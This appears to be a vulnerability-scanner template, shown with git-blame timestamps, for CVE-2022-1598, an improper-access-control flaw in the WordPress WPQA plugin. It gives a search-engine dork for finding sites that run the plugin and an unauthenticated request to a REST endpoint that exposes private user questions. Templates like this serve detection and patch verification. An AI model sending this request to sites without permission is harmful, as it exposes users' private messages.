2022-05-30 10:45:32 +00:00
id : CVE-2022-1598
info :
2023-04-06 22:36:59 +00:00
name : WordPress WPQA <5.5 - Improper Access Control
2022-05-30 10:45:32 +00:00
author : veshraj
2022-06-16 12:09:31 +00:00
severity : medium
2022-05-30 10:45:32 +00:00
description : |
2023-04-06 22:36:59 +00:00
WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.
2022-05-30 10:45:32 +00:00
reference :
- https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598
2023-04-06 22:36:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1598
2022-05-30 10:45:32 +00:00
classification :
2022-06-16 12:09:31 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-05-30 10:45:32 +00:00
cve-id : CVE-2022-1598
2023-07-11 19:49:27 +00:00
cwe-id : CWE-306
epss-score : 0.01854
cpe : cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:*
2022-05-30 10:45:32 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-09-08 22:39:14 +00:00
google-query : inurl:/wp-content/plugins/wpqa
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : 2code
product : wpqa_builder
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan
2022-05-30 10:45:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-30 10:45:32 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-json/wp/v2/asked-question'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"id":'
- '"rendered":'
condition : and
- type : status
status :
2023-04-06 22:36:59 +00:00
- 200